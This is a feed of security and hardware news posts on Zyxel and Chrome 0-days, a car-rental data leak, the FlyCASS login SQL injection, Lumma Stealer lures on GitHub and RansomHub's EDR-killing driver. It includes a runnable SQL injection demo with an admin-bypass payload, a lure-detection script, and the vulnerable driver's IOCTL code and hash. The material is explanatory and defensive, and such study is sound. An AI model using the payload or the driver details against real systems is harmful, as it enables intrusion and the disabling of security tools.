The Red Hot Cyber hacker group HackerHood has discovered a new 0-day in Zyxel security appliances. The vulnerability was found by security researchers Alessandro Sgreccia and Manuel Roccon, members of the HackerHood team, during the research they continuously carry out on Zyxel devices.

During the team's research on Zyxel devices, a security bug was identified (others are still being handled by the vendor) and immediately reported to Zyxel following international Coordinated Vulnerability Disclosure (CVD) best practices.

The new vulnerabilities found in Zyxel products

CVE-2024-7203 is a command injection vulnerability affecting firmware versions V4.60 through V5.38 of the Zyxel ATP and USG FLEX series. It allows an authenticated attacker with administrator privileges to execute arbitrary operating system commands by issuing specially crafted CLI commands. The vulnerability is rated high severity, with a CVSS score of 7.2, indicating a significant risk to the integrity and confidentiality of the system; since it requires administrator credentials, its practical impact is that a compromised or malicious administrator account yields full control of the underlying OS rather than only the management interface.

More details are available in Zyxel's official advisory.

The HackerHood hacker group


HackerHood is a group within the Red Hot Cyber community that specializes in technical activities aimed at fostering collaboration through ethical hacking (penetration testing and 0-day research), programming and malware analysis.

One of HackerHood's programs is precisely the identification of undocumented bugs (so-called 0-days): once team members find 0-day vulnerabilities in widely used products, they work with the vendors to improve the products' security.

These activities follow the Coordinated Vulnerability Disclosure process, and only after the vendor has published a fix do public disclosure and the release of any Proof of Concept (PoC) take place.

Another HackerHood program is penetration testing of the ICT infrastructure of Italian companies that adopt "responsible disclosure" policies. All this contributes to the Italian sector, helping companies improve their security and encouraging others to do the same.

So, if you are a security analyst with ethical hacking skills or a bug researcher who embraces the HackerHood Manifesto, you too could be a HackerHood member. Write to the team's mailbox: info@hackerhood.it

"Keep your chin up. One day there will be happiness again in Nottingham, you'll see." (Robin Hood)

The article HackerHood di RHC scopre un nuovo 0day sui prodotti Zyxel first appeared on il blog della sicurezza informatica.



Civil society organisations call for EU spyware ban


In a joint statement, civil society organisations are demanding comprehensive legislation banning spyware throughout the EU, citing widespread misuse and insufficient regulation.


euractiv.com/section/data-priv…



Google Chrome 0-day exploited by North Korean hackers to drain cryptocurrency wallets


North Korean hackers are exploiting a zero-day vulnerability in Google Chrome to take control of systems and seize victims' cryptocurrency assets.

Microsoft confirmed that the Citrine Sleet group (formerly DEV-0139) used the CVE-2024-7971 zero-day to deploy the FudModule rootkit after obtaining SYSTEM privileges through a Windows kernel exploit.

The main target of the attacks is the cryptocurrency sector, where the hackers seek financial gain. Citrine Sleet has long been known for attacks on financial institutions and, above all, on organizations operating in the cryptocurrency sector and their employees. The group has previously been linked to North Korean intelligence.

Citrine Sleet (also tracked as AppleJeus, Labyrinth Chollima and UNC4736) has repeatedly used fake websites posing as legitimate cryptocurrency exchanges. The hackers have infected victims' systems through fake job applications or through fake wallet and trading applications. For example, in March 2023 UNC4736 compromised the software supply chain of the 3CX video-conferencing product, an intrusion that traced back to a trojanized build of the X_TRADER software, a tool for automated securities trading.

Google's Threat Analysis Group (TAG) also confirmed the link between the AppleJeus group and the compromise of the Trading Technologies website. The US government has warned for years about the risks posed by North Korean hackers targeting cryptocurrency companies and their employees with the AppleJeus malware.

A week ago, Google fixed the CVE-2024-7971 zero-day in the V8 JavaScript engine used in Chrome. The bug allowed attackers to execute code remotely inside the Chromium browser sandbox, after which they used the browser to download an exploit for CVE-2024-38106 in the Windows kernel. The chain gives the attackers SYSTEM rights and lets them load the FudModule rootkit into memory, where it is used to manipulate kernel objects and bypass security mechanisms.

Since its discovery in October 2022, the FudModule rootkit has also been used by another North Korean group, Diamond Sleet, which uses similar attack tools and infrastructure. In August 2024, Microsoft released a security update fixing CVE-2024-38193 in the AFD.sys driver, which was also used in Diamond Sleet attacks.

The article Lo 0-day di Google Chrome viene sfruttato dagli Hacker Nord-Coreani per Svuotare i Wallett di Criptovaluta first appeared on il blog della sicurezza informatica.



Alleged breach of the Galdieri Rent database published on BreachForums


Alarming news has emerged in the cybersecurity world: a threat actor calling himself "Satanic" has posted on BreachForums a database allegedly stolen from Galdieri Rent, a company specializing in car rental.

The leak, dated September 2, 2024, has raised concern both for the scope of the exposed information and for the potential consequences for the company's customers.

At present we cannot confirm the accuracy of the report, since the organization has not yet issued any official press release about the incident on its website. This article should therefore be treated as an "intelligence source".

The Satanic Cloud group

The Satanic Cloud is a relatively new hacker group, already known in the cybersecurity world for leaking stolen sensitive data. The group gained notoriety by publishing on BreachForums databases stolen from several organizations, including large school districts such as the Los Angeles Unified School District (LAUSD).

One of their most striking actions was the disclosure of a vast dataset including personal information of more than 24 million students and thousands of teachers and school staff. That attack was reportedly facilitated by a vulnerability in the Amazon Relational Database Service (RDS), showing that the group is able to exploit flaws in cloud platforms to gain access to sensitive data. The group's leader, known as "Satanic", has used platforms such as Telegram and BreachForums to distribute and sell this information.

Beyond school data, The Satanic Cloud has been involved in other stolen-data leak operations, showing a growing interest in monetizing data through the dark web and other illicit data-trading platforms (HackRead, Auth Lab, The 74 Million).

Details of the possible breach


According to the post published by the hacker, the compromised database would contain a significant amount of sensitive data.
In particular, the database would include information on:

  • 100,000 registered users: with personal data such as ID, first name, last name, email, phone number, password and home address.
  • 130,000 leads: prospective customers with contact details that could be used for marketing or, worse, for malicious purposes.
  • 8,000 cars: detailed vehicle data, which could include models, license plate numbers and other specific information.

The hacker's post, which also included an invitation to download the database via a supplied link, highlights the seriousness of the situation. In the wrong hands, this data could be used for a wide range of illicit activities, from identity theft to targeted scams.

Conclusion


The alleged breach of the Galdieri Rent database is a clear reminder of the importance of adopting advanced security measures to protect personal data. In a context where cyber threats are constantly increasing, companies must be ready to defend themselves against ever more sophisticated attacks. Customers, for their part, must be aware of the risks and ready to take the precautions needed to protect their data.

As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be glad to publish such information in a dedicated article giving prominence to the issue.

RHC will monitor developments in order to publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.

The article Presunta Violazione del Database di Galdieri Rent pubblicato su BreachForums first appeared on il blog della sicurezza informatica.



Building a Stylish iPhone Standby Dock



[Scott Yu-Jan] is a big fan of the iPhone’s standby mode. Put the phone on charge horizontally, and it looks all stylish, with sleek widgets and clocks and stuff showing you information you presumably care about. [Scott] enjoyed this so much, in fact, he whipped up a custom charging dock to make the most of it.

The design was a collaboration with artist [Overwork], who mentioned the DN 40 alarm clock created by legendary designer [Dieter Rams]. [Overwork] sent [Scott] a draft inspired by that product, and he printed one up. It featured an integrated MagSafe charger to juice up the iPhone, and pressing into one side of the phone would pop it free. It was cool, but a little clumsy to use.

[Scott] liked the basic concept, but shows us how he iterated upon it to make it even nicer. He added in a wireless charger for AirPods in the back, gave the device adhesive feet, and a big chunky eject button to release the phone when desired.

You can also grab the files to print your own if you so desire! We’ve seen [Scott’s] work before, too, like his neat 3D scanner build. Video after the break.

youtube.com/embed/L3nWw8qSYgk?…


hackaday.com/2024/09/02/buildi…



Litigation funds: the dangerous ties between finance and justice


@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
In recent years litigation funds have taken hold: they advance the costs of class actions and, if successful, keep part of the compensation
The article "Litigation funds: the dangerous ties between finance and justice" comes from Valori.

valori.it/litigation-funds/



Mélenchon's party confirms motion to remove Macron • Imola Oggi
imolaoggi.it/2024/08/27/partit…


Big Benchy Is a Boat That Really Boats



Benchy is that cute little boat that everyone uses to calibrate their 3D printer. [Emily The Engineer] asked the obvious question—why isn’t it a real working boat? Then she followed through on the execution. Bravo, [Emily]. Bravo.

The full concept is straightforward, but that doesn’t make it any less fun. [Emily] starts by trying to get small Benchys to float, and then steadily steps up the size, solving problems along the way. By the end of it, the big Benchy is printed out of lots of smaller sections that were then assembled into a larger whole. This was achieved with glue and simply using a soldering iron to melt parts together. It’s a common technique used to build giant parts on smaller 3D printers, and it works pretty well.

The basic hull did okay at first, save for some stability problems. Amazingly, though, it was remarkably well sealed against water ingress. It then got a trolling motor, survived a capsizing, and eventually took to the open water with the aid of some additional floatation.

We’ve seen big Benchys before, and we’ve seen fully functional 3D-printed boats before, too. It was about time the two concepts met in reality. Video after the break.

youtube.com/embed/ilIubT7ands?…


hackaday.com/2024/09/02/big-be…



Video Baby Monitor Repair Uncovers Private Data



As the name of the channel implies, [BuyItFixIt] likes to pick up cheap gadgets that are listed as broken and try to repair them. It’s a pastime we imagine many Hackaday readers can appreciate, because even if you can’t get a particular device working, you’re sure to at least learn something useful along the way.

But after recently tackling a VTech video baby monitor from eBay, [BuyItFixIt] manages to do both. He starts by opening up the device and going through some general electronics troubleshooting steps. The basics are very much worth following along with if you’ve ever wondered how to approach a repair when you don’t know what the problem is. He checks voltages, makes sure various components are in spec, determines if the chips are talking to each other with the oscilloscope, and even pulls out the thermal camera to see if anything is heating up. But nothing seems out of the ordinary.
The scope uncovers some serial data.
While poking around with the oscilloscope, however, he did notice what looked like the output of a serial debug port. Sure enough, when connected to a USB serial adapter, the camera’s embedded Linux operating system started dumping status messages into the terminal. But before it got too far along in the boot process, it crashed with a file I/O error — which explains why the hardware all seemed to check out fine.

Now that [BuyItFixIt] knew it was a software issue, he started using the tools built into the camera’s bootloader to explore the contents of the device’s flash chip. He uncovered the usual embedded Linux directories, but when he peeked into one of the partitions labeled Vtech_data2, he got a bit of a shock: the device seemed to be holding dozens of videos. This is particularly surprising considering the camera is designed to stream video to the parent unit, and the fact that it could record video internally was never mentioned in the documentation.

While copying the chip’s contents over serial would have been possible, [BuyItFixIt] instead pulled it out and physically dumped the whole thing with a reader. With a bit of Linux-fu, he’s able to mount the chip dump and confirm that the videos in question are of the previous owner’s infant. Yikes. Of course, he promptly deleted the files once he realized what the camera had stored, but it makes us wonder how many cameras like these are holding private video files waiting for a bad actor to uncover them. This is an important reminder of the inherent dangers of tossing away “broken” smart devices.
Dozens of videos featuring the parent and child were still stored on the device.
As for the repair itself, [BuyItFixIt] reasoned that some file — maybe the database of videos — must have been corrupted on the chip, so he took the nuclear option and wiped it all out. He had to use the bootloader commands to recreate the partition table, but once that was done, the firmware seemed to understand that it had been returned to a factory state and was finally able to boot up normally. He’s documented the commands he used to get it back up and running in the hopes he can help out somebody else with a similarly ailing camera.
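The step of finding the partitions inside a raw chip dump and loop-mounting them is worth showing concretely. The script below is an added example, not [BuyItFixIt]'s own commands: it scans a dump for the on-disk magic of SquashFS, cramfs, ext2/3/4 and UBI at page-aligned offsets (the 4 KiB page size is an assumption), and prints the `mount -o loop,offset=` line for each hit. The sample dump is constructed in code, with three planted headers, and is not an image from a real camera.

```python
"""Carve filesystem images out of a raw flash dump by scanning for magic bytes.

Added example for this page, not the procedure used in the video. The dump
built below is constructed: erased flash (0xFF) with three planted headers.
"""
import struct

PAGE = 0x1000  # assumption: partitions start on a 4 KiB boundary; lower it if you get no hits


def _squashfs(data, off):
    # SquashFS v4 superblock: magic "hsqs", major/minor at +28, bytes_used at +40
    if data[off:off + 4] != b"hsqs":
        return None
    major, _minor = struct.unpack_from("<HH", data, off + 28)
    bytes_used = struct.unpack_from("<Q", data, off + 40)[0]
    if major != 4 or bytes_used == 0:
        return None
    return {"fs": "squashfs", "offset": off, "size": bytes_used}


def _cramfs(data, off):
    # cramfs: magic 0x28CD3D45 (LE), image size at +4, "Compressed ROMFS" at +16
    if data[off:off + 4] != b"\x45\x3d\xcd\x28" or data[off + 16:off + 32] != b"Compressed ROMFS":
        return None
    return {"fs": "cramfs", "offset": off, "size": struct.unpack_from("<I", data, off + 4)[0]}


def _ext(data, off):
    # ext2/3/4: superblock lives 1 KiB into the partition; magic 0xEF53 at sb+0x38
    sb = off + 0x400
    if data[sb + 0x38:sb + 0x3a] != b"\x53\xef":
        return None
    blocks = struct.unpack_from("<I", data, sb + 4)[0]    # s_blocks_count_lo
    log_bs = struct.unpack_from("<I", data, sb + 24)[0]   # s_log_block_size
    if blocks == 0 or log_bs > 6:  # sanity check against a random 0xEF53
        return None
    return {"fs": "ext2/3/4", "offset": off, "size": blocks * (1024 << log_bs)}


def _ubi(data, off):
    # UBI erase-counter header: magic "UBI#"; the image size is not in the header
    if data[off:off + 4] != b"UBI#":
        return None
    return {"fs": "ubi", "offset": off, "size": None}


DETECTORS = (_squashfs, _cramfs, _ext, _ubi)


def carve(data, step=PAGE):
    """Return the filesystem images found in `data`, in offset order."""
    found, off = [], 0
    while off + 0x440 <= len(data):
        hit = None
        for detect in DETECTORS:
            hit = detect(data, off)
            if hit:
                break
        if hit is None:
            off += step
            continue
        found.append(hit)
        # Jump past the image when its size is known so nested magics are not re-reported
        span = hit["size"] or step
        off += (span + step - 1) // step * step
    return found


def mount_commands(findings, image="dump.bin", mountpoint="/mnt/part"):
    """Build the read-only loop-mount command for each carved image (UBI needs the MTD stack instead)."""
    cmds = []
    for i, f in enumerate(findings):
        if f["fs"] == "ubi":
            cmds.append(f"# UBI at offset {f['offset']:#x}: carve it out and use nandsim + ubiattach")
            continue
        fstype = {"squashfs": "squashfs", "cramfs": "cramfs"}.get(f["fs"], "auto")
        cmds.append(f"sudo mount -t {fstype} -o ro,loop,offset={f['offset']:#x} {image} {mountpoint}{i}")
    return cmds


def build_sample_dump():
    """Constructed 8 MiB dump (not a real camera image) with three planted headers."""
    dump = bytearray(b"\xff" * (8 << 20))
    sq = bytearray(96)                          # SquashFS v4 at 1 MiB, 512 KiB used
    sq[0:4] = b"hsqs"
    struct.pack_into("<HH", sq, 28, 4, 0)
    struct.pack_into("<Q", sq, 40, 0x80000)
    dump[0x100000:0x100000 + len(sq)] = sq
    sb = bytearray(0x400)                       # ext4-style superblock at 4 MiB + 1 KiB
    struct.pack_into("<I", sb, 4, 512)          # 512 blocks ...
    struct.pack_into("<I", sb, 24, 2)           # ... of 4 KiB each = 2 MiB
    sb[0x38:0x3a] = b"\x53\xef"
    dump[0x400400:0x400800] = sb
    cr = bytearray(64)                          # cramfs at 7 MiB, 256 KiB
    cr[0:4] = b"\x45\x3d\xcd\x28"
    struct.pack_into("<I", cr, 4, 0x40000)
    cr[16:32] = b"Compressed ROMFS"
    dump[0x700000:0x700000 + len(cr)] = cr
    return bytes(dump)


if __name__ == "__main__":
    hits = carve(build_sample_dump())
    for h in hits:
        print(h)
    print("\n".join(mount_commands(hits)))
```

Mounting read-only matters here: the point of the exercise is to look, and an accidental write to a journaled filesystem inside the dump would alter evidence of what the device had stored. Feed it a real dump with `carve(open("dump.bin", "rb").read())`; on a dump where nothing is found, try a smaller `step`.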

We can never get enough of this sort of firmware hacking, and the fact that this particular bout opened up with a great real-world example of hardware diagnosis makes it all the better. This is a long video, but one that’s well worth your time to check out. If you’d like to see more repairs from [BuyItFixIt], we’ve got you covered.

youtube.com/embed/eQ9uW95OJ3s?…


hackaday.com/2024/09/02/video-…



Telegram's “People Nearby” feature has disappeared in some regions after Durov's arrest


On 25 August 2024, Telegram founder Pavel Durov was arrested in France. The French authorities suspect that Telegram has been used to support various criminal activities such as drug trafficking, terrorism and cybercrime. In particular, messenger features such as “People Nearby” have drawn the attention of law enforcement.

Telegram's People Nearby feature lets users find other people and local groups close to them using geolocation data. Over its lifetime it acquired a controversial reputation, since it was often used by criminals to stalk and track people.

It was also actively used in tools such as CCTV (Close-Circuit Telegram Vision), developed by Ivan Glinkin. This tool let you enter coordinates and obtain a list of users within a radius of up to 500 metres, which made it convenient for criminal use.

Telegram users recently noticed that the People Nearby feature has stopped working. It is not known whether this is due to a technical problem or a deliberate shutdown. It is also worth noting that the day before, the feature showing the active-user counter for bots stopped working, which could indicate technical changes or updates in the messenger.

These developments come amid growing pressure on Telegram from European regulators, especially after the Digital Services Act (DSA) started to apply in 2023, increasing oversight of digital platforms and obliging them to take more active measures to moderate content.

The disabling of the People Nearby feature could be due both to this pressure and to the recent abuse of the feature.

The article “Telegram's “People Nearby” feature has disappeared in some regions after Durov's arrest” comes from il blog della sicurezza informatica.



A Digital Replacement For Your Magic Eye



Magic Eye tubes were popular as tuning guides on old-school radio gear. However, the tubes, the 6U5 model in particular, have become rare and remarkably hard to come by of late. When the supply dried up, [Bjørner Sandom] decided to build a digital alternative instead.

The build relies on a small round IPS display, measuring an inch in diameter and with a resolution of 128×115 pixels. One can only presume it’s round but not perfectly so. It was then fitted with a 25mm glass lens in order to give it a richer, deeper look more akin to a real Magic Eye tube. In any case, a STM32F103CBT was selected to drive the display, with the 32-bit ARM processor running at a lovely 72 MHz for fast and smooth updates of the screen.

The screen, controller, and supporting circuitry are all built onto a pair of PCBs and installed in a 3D-printed housing that lives atop a tube base. The idea is that the build is a direct replacement for a real 6U5 tube. The STM32 controller receives the automatic gain control voltage from the radio set it’s installed in, and then drives the screen to behave as a real 6U5 tube would under those conditions.

By virtue of the smart design, smooth updates, and that nifty glass lens, the final product is quite a thing to behold. It really does look quite similar to the genuine article. If you’ve got a beloved old set with a beleaguered magic eye, you might find this a project worth replicating. Video after the break.

youtube.com/embed/ghJo8rc5Zvc?…

youtube.com/embed/Q379PuWvB2U?…


hackaday.com/2024/09/02/a-digi…



2024 Tiny Games Contest: Morse Quest Goes Where You Do


The Morse Quest game in semi-darkness to show off the dit-dahing light.

Do you know Morse code already? Or are you maybe trying to learn so you can be an old school ham? Either way, you could have a lot of fun with [felix]’s great little entry into the 2024 Tiny Games Contest — Morse Quest.

This minimalist text-based adventure game is played entirely in Morse code. That is, the story line, all the clues, and the challenges along the way are presented by a blinking LED. In turn, commands like LOOK, TAKE, and INVENTORY are entered with the slim key on the lower right side. A wee potentiometer allows the player to adjust the blink rate of the LED, so it’s fun for all experience levels. Of course, one could always keep a Morse chart handy.

The brains of this operation is an Arduino Nano, and there’s really not much more to the BOM than that. It runs on a 9 V battery, so theoretically it could be taken anywhere you want to escape reality for a while. Be sure to check out the demo video after the break.

youtube.com/embed/rrmVYNtu1S4?…

2024 Tiny Games Challenge


hackaday.com/2024/09/02/2024-t…



Elly, please, forget about Renzi in Liguria and set the centre-left's line for the Region


@Politica interna, europea e internazionale
This is an appeal, indeed an urgent request, an anguished plea addressed to the national and local leaders of the parties of the so-called opposition, and in particular to the Democratic Party. In particular I am addressing secretary Elly Schlein



Palestinians denounce: serious conditions of MP Khalida Jarrar in prison in Israel


@Notizie dall'Italia e dal mondo
The Popular Front parliamentarian, detained without trial for eight months, is reportedly held in strict isolation and subjected to severe restrictions despite her precarious health
The article



A SQL Injection Exposes Cockpits! Researchers Discover a Threat in Aviation Systems


Cybersecurity specialists have discovered a vulnerability in one of the main security systems of air transport that allowed unauthorized persons to bypass airport security checks and gain access to aircraft cockpits.

Researchers Ian Carroll and Sam Curry discovered a vulnerability in FlyCASS, a third-party web service that some airlines use to manage their Known Crewmember (KCM) program and Cockpit Access Security System (CASS). KCM is a TSA program that lets pilots and flight attendants skip security screening, while CASS lets authorized pilots ride in the cockpit when travelling.

The KCM system, operated by ARINC (a subsidiary of Collins Aerospace), verifies airline employees' credentials through a dedicated online platform. To skip screening, a verification process must be followed, which includes scanning a KCM barcode or entering an employee ID number, followed by a cross-check against the airline's database.

The researchers found that the FlyCASS login system was susceptible to a SQL injection issue. Using this bug, they managed to log in to the system with administrator rights for a specific airline (Air Transport International) and were able to modify employee data. During testing, the researchers added a fictitious employee named “Test TestOnly” to the system and then gave that account KCM and CASS access.
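What the researchers describe, an injection in a login form that yields an administrator session for one airline, is easy to reproduce in miniature. The snippet below is an added example, not FlyCASS code: it puts a string-built login query next to its parameterised replacement against an in-memory SQLite database, with an invented schema, user names and passwords (only the employee name is the one quoted in the article), and shows that the same payload which logs the attacker in as the airline admin, and lets them enrol an employee with KCM and CASS flags, returns nothing once the query is parameterised.

```python
"""Login SQL injection, vulnerable and fixed, on an in-memory SQLite database.

Added example for this page; the schema, accounts and passwords are invented
and none of FlyCASS's real code is shown. Passwords are stored in clear only
to keep the demo short: real systems hash them.
"""
import sqlite3

# Classic tautology payload: closes the string, adds a clause that selects the
# admin row, and comments out the password check.
PAYLOAD = "' OR role='admin' --"


def setup():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT, airline TEXT, role TEXT);
        INSERT INTO users VALUES ('ati_admin', 'c0rrect-h0rse', 'ATI', 'admin');
        INSERT INTO users VALUES ('ati_clerk', 'hunter2', 'ATI', 'user');
        CREATE TABLE employees(airline TEXT, name TEXT, kcm INTEGER, cass INTEGER);
    """)
    return db


def login_vulnerable(db, username, password):
    """User input is pasted into the SQL text, so it can rewrite the query."""
    sql = (f"SELECT username, airline, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_fixed(db, username, password):
    """Bound parameters: the driver sends the values separately, never as SQL."""
    sql = "SELECT username, airline, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def add_employee(db, session, name, kcm, cass):
    """What an admin session can do: enrol a crew member with KCM/CASS access."""
    if session is None or session[2] != "admin":
        return False
    db.execute("INSERT INTO employees VALUES (?, ?, ?, ?)", (session[1], name, kcm, cass))
    return True


def list_employees(db):
    return db.execute("SELECT airline, name, kcm, cass FROM employees ORDER BY name").fetchall()


if __name__ == "__main__":
    db = setup()
    session = login_vulnerable(db, PAYLOAD, "anything")
    print("vulnerable login ->", session)
    print("added employee:", add_employee(db, session, "Test TestOnly", 1, 1))
    print(list_employees(db))
    print("fixed login ->", login_fixed(db, PAYLOAD, "anything"))
```

The vulnerable query becomes `... WHERE username = '' OR role='admin' --' AND password = 'anything'`: the tautology picks the admin row and the comment marker discards the password clause. The parameterised version receives the same bytes as a plain string value and matches no row.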

“Anyone with a basic knowledge of SQL injection could go to this site and add anyone to KCM and CASS, which allowed them to bypass security checks and gain access to the cockpits of commercial airliners,” says Carroll.

Realizing the seriousness of the situation, the researchers immediately reported the vulnerability to the authorities, contacting the US Department of Homeland Security (DHS) on 23 April 2024.

As a result, DHS acknowledged the seriousness of the vulnerability and confirmed that FlyCASS had been disconnected from the KCM/CASS system on 7 May 2024 as a precautionary measure. Shortly afterwards the vulnerability in FlyCASS was fixed. However,

Carroll also points out that the vulnerability could lead to large-scale security breaches, such as altering the profiles of existing KCM members to bypass any checks required for new members.

The article “A SQL Injection Exposes Cockpits! Researchers Discover a Threat in Aviation Systems” comes from il blog della sicurezza informatica.



On the arrest of the founder of Telegram and the accusations of illiberalism

[quote]But is trying to regulate the Web and to make its actors accountable really an illiberal aim? The arrest, in France, of Telegram founder Pavel Durov, the opening of an investigation against him by the European Commission and the suspension of X ordered by the Court



Lumma Stealer is being distributed through 29,000 GitHub comments


Hackers are abusing GitHub to distribute the information-stealing malware Lumma Stealer. The attackers disguise the malware as fake fixes, which they post in comments on projects.

This campaign was first discovered by one of the authors of the teloxide library, who warned on Reddit that he had received five different comments on his GitHub issues. They were all disguised as fixes but in reality promoted malware.

Bleeping Computer reports having identified thousands of similar comments containing fake fixes on a variety of GitHub projects. The attackers invite people to download a password-protected archive from mediafire.com or via a shortened bit.ly URL, and then run the executable it contains.

Clicking the link leads to a download page for the file fix.zip, which contains several DLLs and an executable named x86_64-w64-ranlib.exe. The password to open the archive, found in all the comments, was the same: “changeme”.

Running the executable in Any.Run showed that it is an information-stealing malware: Lumma Stealer.
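The lure has a fixed shape: a “here is the fix” comment, a link to a file host or URL shortener, a password-protected archive with the password spelled out in the comment, posted in bulk across many repositories. The script below is an added example, not tooling from the report: it scores issue comments on those indicators and also groups near-identical bodies, since the same text posted many times with rotated links is itself a signal. The four sample comments are constructed, and the bit.ly paths in them are placeholders.

```python
"""Triage GitHub issue comments for the fake-fix lure used to push Lumma Stealer.

Added example for this page, not tooling from the report. The sample comments
are constructed and the shortened URLs in them are placeholders.
"""
import re
from collections import Counter

# Indicators taken from the campaign: file host / shortener, archive, password, "fix" pitch.
LURE_HOSTS = {"bit.ly", "mediafire.com"}
URL_RE = re.compile(r"https?://([\w.-]+)[^\s)>]*", re.I)
ARCHIVE_RE = re.compile(r"\b[\w-]+\.(?:zip|rar|7z)\b", re.I)
PASSWORD_RE = re.compile(r"\b(?:password|pass|pw)\b\s*(?:is|:|=)?\s*[\"'`]?([A-Za-z0-9_!@#$%-]+)", re.I)
FIX_PITCH_RE = re.compile(r"\b(?:fix|fixed|solution|patch)\b", re.I)


def _host(url_host):
    h = url_host.lower()
    return h[4:] if h.startswith("www.") else h


def score_comment(text):
    """Return (score, reasons) for one comment body; each indicator adds one point."""
    reasons = []
    hosts = {_host(m.group(1)) for m in URL_RE.finditer(text)}
    if hosts & LURE_HOSTS:
        reasons.append("link to file host or shortener: " + ", ".join(sorted(hosts & LURE_HOSTS)))
    if ARCHIVE_RE.search(text):
        reasons.append("asks the reader to download an archive")
    pw = PASSWORD_RE.search(text)
    if pw:
        reasons.append("archive password given in the comment: " + pw.group(1))
    if FIX_PITCH_RE.search(text):
        reasons.append("presented as a fix")
    return len(reasons), reasons


def normalize(text):
    """Collapse URLs, digits and whitespace so mass-posted bodies with rotated links group together."""
    t = URL_RE.sub("<url>", text.lower())
    t = re.sub(r"\d+", "<n>", t)
    return " ".join(t.split())


def triage(comments, threshold=3, min_repeats=2):
    """comments: list of {"id", "repo", "body"}. Return {id: reasons} for comments worth a look."""
    repeats = Counter(normalize(c["body"]) for c in comments)
    flagged = {}
    for c in comments:
        score, reasons = score_comment(c["body"])
        n = repeats[normalize(c["body"])]
        if n >= min_repeats:
            score += 1
            reasons.append(f"same text posted {n} times across the sample")
        if score >= threshold:
            flagged[c["id"]] = reasons
    return flagged


SAMPLE_COMMENTS = [  # constructed, not real GitHub data
    {"id": 101, "repo": "org/app",
     "body": "Same issue here, found the fix! Download fix.zip from https://bit.ly/EXAMPLE1 (password: changeme) and run the exe inside."},
    {"id": 102, "repo": "org/lib",
     "body": "Same issue here, found the fix! Download fix.zip from https://bit.ly/EXAMPLE2 (password: changeme) and run the exe inside."},
    {"id": 103, "repo": "org/app", "body": "Thanks, this was fixed in PR #12, closing."},
    {"id": 104, "repo": "org/lib", "body": "Still reproducible on 3.11, any update?"},
]

if __name__ == "__main__":
    for cid, why in triage(SAMPLE_COMMENTS).items():
        print(cid, "->", "; ".join(why))
```

A maintainer's legitimate “fixed in PR #12” scores one point and is left alone; the two lure comments score four each before the duplicate bonus. Wire the output to a moderation queue rather than to automatic deletion: the indicators are heuristics, and a genuine contributor can occasionally share an archive.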

Security specialist Nicholas Sherlock reports that in just three days, unknown attackers posted more than 29,000 comments on GitHub distributing Lumma.

Recall that on the victim's system this malware attempts to steal cookies, credentials, passwords, bank card data and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox and other Chromium-based browsers.

Lumma can also steal cryptocurrency wallet data, private keys and text files named seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt and *.pdf, since they probably contain private keys and passwords.

Although GitHub staff remove the malicious comments as soon as they are discovered, many people have reported being affected by this attack.

Anyone who ran the malware is advised to change the passwords of all their accounts as soon as possible, setting a unique password for each site, and to move their cryptocurrency to a new wallet.

The article “Lumma Stealer is being distributed through 29,000 GitHub comments” comes from il blog della sicurezza informatica.



Deca – Strategia esoterica


“Each new work of mine represents the sum and synthesis of all those made before it, once again evolving their meaning and artistic scope. I believe that “Strategia Esoterica” nonetheless has a far greater force because it is the fruit of a very powerful transmutation” - Deca @Musica Agorà

iyezine.com/deca-strategia-eso…



Spiders Are Somehow Hacking Fireflies to Lure More Victims



What happens when an unfortunate bug ends up in a spider’s web? It gets bitten and wrapped in silk, and becomes a meal. But if the web belongs to an orb-weaver and the bug is a male firefly, it seems the trapped firefly — once bitten — ends up imitating a female’s flash pattern and luring other males to their doom.

Fireflies communicate with flash patterns (something you can experiment with yourself using nothing more than a green LED) and males looking to mate will fly around flashing a multi-pulse pattern with their two light-emitting lanterns. Females will tend to remain in one place and flash single-pulse patterns on their one lantern.

When a male spots a female, they swoop in to mate. Spiders have somehow figured out a way to actively take advantage of this, not just inserting themselves into the process but actively and masterfully manipulating male fireflies, causing them to behave in a way they would normally never do. All with the purpose of subverting firefly behavior for their own benefit.

It all started with an observation that almost all fireflies in webs were male, and careful investigation revealed it’s not just some odd coincidence. When spiders are not present, the male fireflies don’t act any differently. When a spider is present and detects a male firefly, the spider wraps and bites the firefly differently than other insects. It’s unknown exactly what happens, but this somehow results in the male firefly imitating a female’s flash patterns. Males see this and swoop in to mate, but with a rather different outcome than expected.

The research paper contains added details but it’s clear that there is more going on in this process than meets the eye. Spiders are already fascinating creatures (we’ve seen an amazing eye-tracking experiment on jumping spiders) and it’s remarkable to see this sort of bio-hacking going on under our very noses.


hackaday.com/2024/09/02/spider…



The organization that runs National Novel Writing Month, a November challenge to write 50,000 words, said "the categorical condemnation of Artificial Intelligence has classist and ableist undertones."#News #AI #nanowrimo


RansomHub's Secret Weapon for disabling EDRs. The BYOVD PoC used by EDRKillShifter


In recent years cybersecurity has evolved rapidly to counter increasingly sophisticated threats. Nevertheless, cybercriminals keep finding new ways to bypass the defences organizations deploy.

A recent example is the use of vulnerable drivers in targeted attacks, a technique known as Bring Your Own Vulnerable Driver (BYOVD). In this context the ransomware group known as RansomHub exploited a vulnerable driver to disable endpoint detection and response (EDR) systems using a tool called EDRKillShifter, which we covered recently.

Description of the Vulnerable Driver


The driver abused by RansomHub is TFSysMon, the ThreatFire System Monitor driver (as reported by Sophos), according to the analysis carried out by security researcher Alex Necula of ACS Data System S.p.A, who gave Red Hot Cyber a preview of his analysis report.

This driver has a critical vulnerability caused by missing access controls on an IOCTL call (0xB4A00404).

The driver's SHA256 hash is 1c1a4ca2cbac9fe5954763a20aeb82da9b10d028824f42fff071503dcbe15856.

The core problem lies in a subroutine called from the IOCTL handler, which uses the ZwTerminateProcess API without checking the permissions of the calling user.

How EDRKillShifter Works


